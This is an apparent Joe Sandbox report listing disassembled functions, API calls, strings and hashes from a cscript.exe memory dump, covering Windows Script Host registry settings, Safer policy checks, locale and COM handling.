                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$InfoLocale$DefaultFileFreeModuleNameStringUsermemcpystrcpy_s
                                                      • String ID: %s%s.DLL
                                                      • API String ID: 748293063-4110387156
                                                      • Opcode ID: 73d36f8499d7e78d95fa0d3a1c904a5bf5e071e0d6942902555f1361cd110422
                                                      • Instruction ID: 81cad590d71a66534ab6c2e81e0d25805ebb80f9758bf64bc761d53fe9797f2c
                                                      • Opcode Fuzzy Hash: 73d36f8499d7e78d95fa0d3a1c904a5bf5e071e0d6942902555f1361cd110422
                                                      • Instruction Fuzzy Hash: 31A1BF71A0021DABDB25DBA4DC58FEA77BFEF08304F044496E546E3241E6719A89CFE1
                                                      Function 00627490 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 220registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,?,00000000,00000000), ref: 0062750C
                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,?), ref: 00627536
                                                      • SysFreeString.OLEAUT32(00000000), ref: 00627565
                                                      • RegCloseKey.ADVAPI32(?), ref: 00627576
                                                      • RegCloseKey.ADVAPI32(?), ref: 00627587
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000), ref: 0062F7C8
                                                      • __alloca_probe_16.LIBCMT ref: 0062F7D8
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,?,00000000,00000000), ref: 0062F7FB
                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,00000000,00000000), ref: 0062F81E
                                                      • RegisterEventSourceW.ADVAPI32(00000000,Windows Script Host), ref: 0062F87F
                                                      • GetUserNameW.ADVAPI32(?,00000100), ref: 0062F8A1
                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,?), ref: 0062F8D1
                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,?), ref: 0062F93E
                                                      • ReportEventW.ADVAPI32(?,00000010,00000000,C0FF03E8,00000000,00000001,00000000,?,00000000), ref: 0062F9AB
                                                      • DeregisterEventSource.ADVAPI32(?), ref: 0062F9B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: EventNameOpen$AccountByteCharCloseLookupMultiSourceWide$DeregisterFreeRegisterReportStringUser__alloca_probe_16
                                                      • String ID: LogSecurityFailures$LogSecuritySuccesses$Software\Microsoft\Windows Script Host\Settings$Windows Script Host
                                                      • API String ID: 1645720072-2261343319
                                                      • Opcode ID: d1f0c499428defddec04da7befbd57425dfaabb861640f45d6b72ce8bc306189
                                                      • Instruction ID: 1950b105875519fc29dcf2cab4f234d997ea6a76294e93c81a1f1b236c1000ca
                                                      • Opcode Fuzzy Hash: d1f0c499428defddec04da7befbd57425dfaabb861640f45d6b72ce8bc306189
                                                      • Instruction Fuzzy Hash: E9819570E40739ABDB209F60AC4DFEAB77AAB14705F1001E9F509B6291DB749E84CF91
                                                      Function 0062BCDF Relevance: 18.1, APIs: 12, Instructions: 126memorywindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,00000000,?,00000000,0062B95E,?), ref: 0062BD1E
                                                      • SysAllocString.OLEAUT32(?), ref: 0062BD2F
                                                      • LocalFree.KERNEL32(00000000,?,00000000,0062B95E,?), ref: 0062BD51
                                                      • GetLastError.KERNEL32(?,00000000,0062B95E,?), ref: 006314B1
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,00000000,0062B95E,?), ref: 006314D8
                                                      • __alloca_probe_16.LIBCMT ref: 006314E4
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000,?,00000000,0062B95E,?), ref: 006314FF
                                                      • FormatMessageA.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00000000,0062B95E,?), ref: 0063151B
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,00000000,?,00000000,0062B95E,?), ref: 0063152E
                                                      • LocalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,0062B95E,?), ref: 00631543
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,00000000,?,00000000,0062B95E,?), ref: 0063155D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocFormatLocalMessage$ErrorFreeLastString__alloca_probe_16
                                                      • String ID:
                                                      • API String ID: 488895409-0
                                                      • Opcode ID: 07cc4d984e7b24ec4e4cdc3248940294bf806c1f7ab3e0b828cd7abf52252745
                                                      • Instruction ID: 57ef68daddbdcbfb0749b85ff86ccf9fa81c41a19341affa9f4b784b3852662d
                                                      • Opcode Fuzzy Hash: 07cc4d984e7b24ec4e4cdc3248940294bf806c1f7ab3e0b828cd7abf52252745
                                                      • Instruction Fuzzy Hash: C041917090153ABBCB214BA6AC08EEF7FBEEF46764F105215F815A2290DB348900DEF1
                                                      Function 00632674 Relevance: 16.6, APIs: 11, Instructions: 89fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 00632698
                                                      • GetLastError.KERNEL32 ref: 006326A7
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 006326BE
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?), ref: 006326D1
                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 006326DD
                                                      • FindClose.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 0063273C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileFindLast$AttributesByteCharCloseFirstMultiWide
                                                      • String ID:
                                                      • API String ID: 443336949-0
                                                      • Opcode ID: ff8dfb5db23a3b25e897bfcf2ed89a58c101f11b8799e4c16c78feb2cc57c673
                                                      • Instruction ID: b70c8a4c3dce2811eb3ab96406d49dcaebe39c36c5f5ef6579429fbe6c67cbb6
                                                      • Opcode Fuzzy Hash: ff8dfb5db23a3b25e897bfcf2ed89a58c101f11b8799e4c16c78feb2cc57c673
                                                      • Instruction Fuzzy Hash: C8217F70500116AFAB205BB59C9EABB36BEFF56335F201614F861C12F0DA648D41AAF2
                                                      Function 0062CD6C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 564comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoCreateInstance.OLE32(0062373C,00000000,00000001,006237AC,?,00000000,00000000,?), ref: 0062CDE6
                                                      • CoCreateInstance.OLE32(0062374C,00000000,00000001,006237AC,?), ref: 0062CDFA
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00627E84,00000000), ref: 0062CE11
                                                      • CoGetClassObject.OLE32(0062376C,00000001,00000000,0062375C,?), ref: 0062CEB7
                                                      • CreateBindCtx.OLE32(00000000,00000000), ref: 0062D062
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Create$Instance$BindClassDefaultObjectUser
                                                      • String ID: WSH$WScript
                                                      • API String ID: 1420412123-1019903269
                                                      • Opcode ID: 1dd96a9b12ed377399a27a9985e4fe88c5d6236fcbe1a04b934c02727d53701d
                                                      • Instruction ID: 39b0368507840382d9cda5bb0b2da35b9b18719ea5fe6d34f6486bcf765cea75
                                                      • Opcode Fuzzy Hash: 1dd96a9b12ed377399a27a9985e4fe88c5d6236fcbe1a04b934c02727d53701d
                                                      • Instruction Fuzzy Hash: 2112B374B00A25DFDB149F95E894AAD7BB3AF88310F15006DE602AB3A0CF75AC41CF95
                                                      Function 0062AA82 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,0062AA51), ref: 0062AA92
                                                      • GetProcAddress.KERNEL32(00000000,SetThreadUILanguage), ref: 0062AAA4
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,0062AA51), ref: 0062AACE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: SetThreadUILanguage$kernel32.dll
                                                      • API String ID: 145871493-927383962
                                                      • Opcode ID: 5b7ab3f228af077bc0c734f0d62544412231a3eb3e546f89685ce581ab674b52
                                                      • Instruction ID: 7a0ba2c29c9a5df482f0c9b053a068f9b0ba4f9e7f68959773670eb99153ba69
                                                      • Opcode Fuzzy Hash: 5b7ab3f228af077bc0c734f0d62544412231a3eb3e546f89685ce581ab674b52
                                                      • Instruction Fuzzy Hash: 06F0A776500721ABD31027E9BD898BF3AABDFC07157151129F89393340EFB4CD01EAA2
                                                      Function 0062DC00 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0062DC2D
                                                      • GetCurrentProcessId.KERNEL32 ref: 0062DC3C
                                                      • GetCurrentThreadId.KERNEL32 ref: 0062DC45
                                                      • GetTickCount.KERNEL32 ref: 0062DC4E
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0062DC63
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                      • String ID:
                                                      • API String ID: 1445889803-0
                                                      • Opcode ID: e8815ffac5e90418af69f9ba7c03e0207999b29395ddfdc59cd0cfbaf295e201
                                                      • Instruction ID: 8b3ab4ff380a84e775f44b79295edd186746678d4979cafee123c9d01b02559e
                                                      • Opcode Fuzzy Hash: e8815ffac5e90418af69f9ba7c03e0207999b29395ddfdc59cd0cfbaf295e201
                                                      • Instruction Fuzzy Hash: E7114871E00209EBCB14DBF8EA48A9EB7FAFF48358F511865D401E7220E7709A04DF90
                                                      Function 006264E0 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 261comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0062DBC0: malloc.MSVCRT ref: 0062DBD8
                                                        • Part of subcall function 0062647E: GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,00626542,00001000,?,?), ref: 006264A8
                                                        • Part of subcall function 0062647E: HeapAlloc.KERNEL32(00000000,?,00626542,00001000,?,?), ref: 006264AF
                                                      • CLSIDFromString.OLE32(?,00627F49,00001000,?,?), ref: 00626557
                                                      • CoCreateInstance.OLE32(00627F49,00000000,00000017,00623BD4,00000000,?,?), ref: 00626578
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocCreateFromInstanceProcessStringmalloc
                                                      • String ID: WSH$WScript
                                                      • API String ID: 3077083409-1019903269
                                                      • Opcode ID: 301ca0d06260fccdf830cbfdf01e42d89892946d1155ea82a8ee23c6e0671240
                                                      • Instruction ID: 0daddc6e1c17041a54e770283f2c2d09816a89c658c94106735d7b2530318007
                                                      • Opcode Fuzzy Hash: 301ca0d06260fccdf830cbfdf01e42d89892946d1155ea82a8ee23c6e0671240
                                                      • Instruction Fuzzy Hash: BB91D375A009358FCB15DF58E890B6E77A7AF4C710F160069EE42AB391DB35AC028FD6
                                                      Function 0062DCAA Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0062DDE0,006213B4), ref: 0062DCB1
                                                      • UnhandledExceptionFilter.KERNEL32(0062DDE0,?,0062DDE0,006213B4), ref: 0062DCBA
                                                      • GetCurrentProcess.KERNEL32(C0000409,?,0062DDE0,006213B4), ref: 0062DCC5
                                                      • TerminateProcess.KERNEL32(00000000,?,0062DDE0,006213B4), ref: 0062DCCC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                      • String ID:
                                                      • API String ID: 3231755760-0
                                                      • Opcode ID: 9afdaf0a5b74a8b7d6791ade345838c9b93ba36990a6ff444077f7e24b5c785e
                                                      • Instruction ID: 2a1623a05106a160bc0a28060aca9af394b825425bc8cf195bf6d8a3710a6b9b
                                                      • Opcode Fuzzy Hash: 9afdaf0a5b74a8b7d6791ade345838c9b93ba36990a6ff444077f7e24b5c785e
                                                      • Instruction Fuzzy Hash: 0FD0C932000504ABD7042BF1FD0CA493E2AEB4421AF045000F38982020CB338441ABA2
                                                      Function 00635880 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 302COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: WScript.CreateObject
                                                      • API String ID: 0-1366894974
                                                      • Opcode ID: 39edde1431f5a949e272800e3e48637c5ebf1cc9f153b1267e093d85d0e2aee9
                                                      • Instruction ID: 6056ae44b6bc1083329f2a9ea6fd59746384776d59da844d200129384688bca1
                                                      • Opcode Fuzzy Hash: 39edde1431f5a949e272800e3e48637c5ebf1cc9f153b1267e093d85d0e2aee9
                                                      • Instruction Fuzzy Hash: 76A19B76604A129FC310DF64D891A6AB7E7AF88320F15462DF98797390DB34ED05CBD2
                                                      Function 006382B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,00000000,00638371,00000000,00000000,00638426,00000000,00000000,?,?,00000000,?), ref: 006382C4
                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 006382D2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindLoad
                                                      • String ID: MUI
                                                      • API String ID: 2619053042-1339004836
                                                      • Opcode ID: dce43e3b330589e41875aefb3fc2421451aaa7291374888f60a7b5e5fed7e82d
                                                      • Instruction ID: 2ca8a0fe5bbeb890ef0a9b5d563cede46c5495136c422d54a416171f830c7fc8
                                                      • Opcode Fuzzy Hash: dce43e3b330589e41875aefb3fc2421451aaa7291374888f60a7b5e5fed7e82d
                                                      • Instruction Fuzzy Hash: 0DD01231245B307AE72417157C0DFD71A0FDF91725F125041F8109A190DBA55D4255E9
                                                      Function 0062647E Relevance: 5.0, APIs: 4, Instructions: 42memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,00626542,00001000,?,?), ref: 006264A8
                                                      • HeapAlloc.KERNEL32(00000000,?,00626542,00001000,?,?), ref: 006264AF
                                                      • GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,00626542,00001000,?,?), ref: 0062E8CA
                                                      • HeapFree.KERNEL32(00000000,?,00626542,00001000,?,?), ref: 0062E8D1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocFree
                                                      • String ID:
                                                      • API String ID: 756756679-0
                                                      • Opcode ID: 8281748eb1ab5ea4b812331f9bb6d770f72c2e2fb8bdd353c45c7cbfc4b7fb07
                                                      • Instruction ID: 1cfbbc87fe7f89f9897f96266fbccf261edcf1c020b3c2192eb123017b087f5d
                                                      • Opcode Fuzzy Hash: 8281748eb1ab5ea4b812331f9bb6d770f72c2e2fb8bdd353c45c7cbfc4b7fb07
                                                      • Instruction Fuzzy Hash: 44F0F931504621DBD7282FA4ED0875676DAEB00721F20C529F5C6CB2D0D735C8409F65
                                                      Function 0062A9C0 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InitializeCriticalSection.KERNEL32(00639498,00638AD8,000000A0,00626E82), ref: 0062A9E8
                                                      • GetVersionExA.KERNEL32(00000094), ref: 0062AA06
                                                        • Part of subcall function 0062AADC: GetUserDefaultLCID.KERNEL32 ref: 0062AAFD
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CriticalDefaultInitializeSectionUserVersion
                                                      • String ID:
                                                      • API String ID: 340135912-0
                                                      • Opcode ID: ebef666344c762cc8440ae15f49b4e196baeb536e3556f053d3e01c382250d07
                                                      • Instruction ID: 8326412cfbd3e816371a45cddc34f7ef432760b856a61b1c4bf951eecae55139
                                                      • Opcode Fuzzy Hash: ebef666344c762cc8440ae15f49b4e196baeb536e3556f053d3e01c382250d07
                                                      • Instruction Fuzzy Hash: B1117030A04764CFDB248FA4AE0978A77F2AB41305F1055E9D05692291D7F5068ADFB7
                                                      Function 00637E85 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000404,00000008,?,00000020,00000000), ref: 00637EAA
                                                      • wcsncmp.MSVCRT(?,0062433C,00000003), ref: 00637EBF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InfoLocalewcsncmp
                                                      • String ID:
                                                      • API String ID: 4128031126-0
                                                      • Opcode ID: 43a59a58da00fe66f4a7b4d8e4c1a9760492a9eb1bb793a158603b38e87dbadd
                                                      • Instruction ID: 717537a47ec5a40fd78e29a1a15c3ad39bbb401f4f6f5ae5c91a4d23c3cc3796
                                                      • Opcode Fuzzy Hash: 43a59a58da00fe66f4a7b4d8e4c1a9760492a9eb1bb793a158603b38e87dbadd
                                                      • Instruction Fuzzy Hash: 78F027B2A40208ABD710DBB4DC0AFDF77E99B04708F040260BA05E32C1EA70EE05CA95
                                                      Function 0062AB35 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,20000070,00000000,00000002,00000000,?,0062AB0C), ref: 0062AB4B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: f32e745b3888503d5ef66e77eb6a5e0e14d4c1317784bafa67b12d83e9036b5b
                                                      • Instruction ID: ae2a4c88f428e6c4e8502c55d811534d52eb34fcbc9fe80973e8d027a8e564d9
                                                      • Opcode Fuzzy Hash: f32e745b3888503d5ef66e77eb6a5e0e14d4c1317784bafa67b12d83e9036b5b
                                                      • Instruction Fuzzy Hash: 94D05E36510308F7EF248BA19D4AF9B77ADDB4079EF144194A104E3090C6B9DF08EA61
                                                      Function 006276B0 Relevance: 56.3, APIs: 28, Strings: 4, Instructions: 320registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,00000000,-00000001,?,-00000004), ref: 006276FF
                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,00000000), ref: 00627742
                                                      • RegQueryValueExW.ADVAPI32(00000000,TrustPolicy,00000000,?,?,00000004), ref: 00627777
                                                      • RegQueryValueExW.ADVAPI32(00000000,TrustPolicy,00000000,?,?,00000004), ref: 006277E3
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00627844
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00627852
                                                        • Part of subcall function 006278F0: RegQueryValueExW.ADVAPI32(00000001,Enabled,00000000,?,?,?,00000000,00000001,Enabled), ref: 00627945
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,-00000001,?,-00000004), ref: 0062FB38
                                                      • __alloca_probe_16.LIBCMT ref: 0062FB44
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000), ref: 0062FB5C
                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,00000000,?,00000000,00000000,00000000), ref: 0062FB77
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: OpenQueryValue$ByteCharCloseMultiWide$__alloca_probe_16
                                                      • String ID: IgnoreUserSettings$Software\Microsoft\Windows Script Host\Settings$TrustPolicy$UseWINSAFER
                                                      • API String ID: 4224471349-2293819020
                                                      • Opcode ID: 981f57f40253fc1138658965a3d4d47750e032a46d728b2e41e696a87ff9aae3
                                                      • Instruction ID: 5c214d4034844ee729bba750556f400add2a589de48764b6c0b7831c6b6fccf0
                                                      • Opcode Fuzzy Hash: 981f57f40253fc1138658965a3d4d47750e032a46d728b2e41e696a87ff9aae3
                                                      • Instruction Fuzzy Hash: 7BB1AC30B48639BADB208B91AC06FFF777BAB14B15F240125FA51BA2C0D7B49501DF96
                                                      Function 0062AE90 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 226libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0062B100: GetSystemDirectoryA.KERNEL32(?,00000000), ref: 0062B120
                                                        • Part of subcall function 0062B100: GetSystemDirectoryA.KERNEL32(00000000,00000001), ref: 0062B158
                                                        • Part of subcall function 0062B100: strcpy_s.MSVCRT ref: 0062B172
                                                        • Part of subcall function 0062B100: strcpy_s.MSVCRT ref: 0062B183
                                                        • Part of subcall function 0062B100: LoadLibraryExA.KERNEL32(00000000,00000000,00000800), ref: 0062B194
                                                      • GetProcAddress.KERNEL32(00000000,SaferIdentifyLevel), ref: 0062AF21
                                                      • GetProcAddress.KERNEL32(00000000,SaferComputeTokenFromLevel), ref: 0062AF3B
                                                      • GetProcAddress.KERNEL32(00000000,SaferCloseLevel), ref: 0062AF55
                                                      • memset.MSVCRT ref: 0062AF7D
                                                      • memset.MSVCRT ref: 0062AFB9
                                                      • FreeLibrary.KERNEL32(00000000), ref: 0062B0C7
                                                      • SysFreeString.OLEAUT32(00000000), ref: 0062B0E7
                                                      • CloseHandle.KERNEL32(00000000), ref: 0062B0F0
                                                      • SysStringLen.OLEAUT32(?), ref: 00631115
                                                      • wcsrchr.MSVCRT ref: 00631124
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$DirectoryFreeLibraryStringSystemmemsetstrcpy_s$CloseHandleLoadwcsrchr
                                                      • String ID: SCRIPT$SaferCloseLevel$SaferComputeTokenFromLevel$SaferIdentifyLevel$SaferRecordEventLogEntry$advapi32.dll
                                                      • API String ID: 1753717986-3460866070
                                                      • Opcode ID: c71a7cfd13037b014809f74535a3997699b64d436aba388272d46b82612b458e
                                                      • Instruction ID: 648c2a7f9206899b30404aa6a47001f4dc97191f82d48716d4541ab5c3f35373
                                                      • Opcode Fuzzy Hash: c71a7cfd13037b014809f74535a3997699b64d436aba388272d46b82612b458e
                                                      • Instruction Fuzzy Hash: BD917B70A007299FEB208F64DC48BDABBB6FF45304F005199E549AB380DB759E85CF92
                                                      Function 006343B7 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 235COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 006343F4
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00634706), ref: 00634400
                                                      • GetTempPathA.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,00634706), ref: 00634420
                                                      • GetTempPathA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00634706), ref: 0063444A
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00634706), ref: 00634454
                                                      • CloseHandle.KERNEL32(00000001,?,?,?,?,?,?,?,?,00634706), ref: 00634612
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastPathTemp$ByteCharCloseHandleMultiWide
                                                      • String ID: wsh
                                                      • API String ID: 4111154415-3917767832
                                                      • Opcode ID: 1e4c7ea2c859045a37ad09a2a2e1b4ffed5d9d277ecac3b674a724a69229a1c7
                                                      • Instruction ID: 0c3c1efabe7c651e52e555a031878a81d577cb98ee6dcf4ecf9b087f8d7947c5
                                                      • Opcode Fuzzy Hash: 1e4c7ea2c859045a37ad09a2a2e1b4ffed5d9d277ecac3b674a724a69229a1c7
                                                      • Instruction Fuzzy Hash: 1671C376A01226AB8B109FA5CC48AFFBBAEEF06361F114129F845E7251DB34DD01D7E1
                                                      Function 006275B0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 190registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(?,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,00020019,00000000,?,00000000,-00000001,?,-00000004,?,?,006271FE,80000002), ref: 006275EF
                                                      • RegQueryValueExW.ADVAPI32(?,Timeout,00000000,006271FE,?,00000004,?,00000000,00000000,00000000,00020019,00000000,?,00000000,?,00000000), ref: 00627628
                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,00020019,00000000,?,00000000,?,00000000,00000000,00000000,?,?,006271FE), ref: 00627685
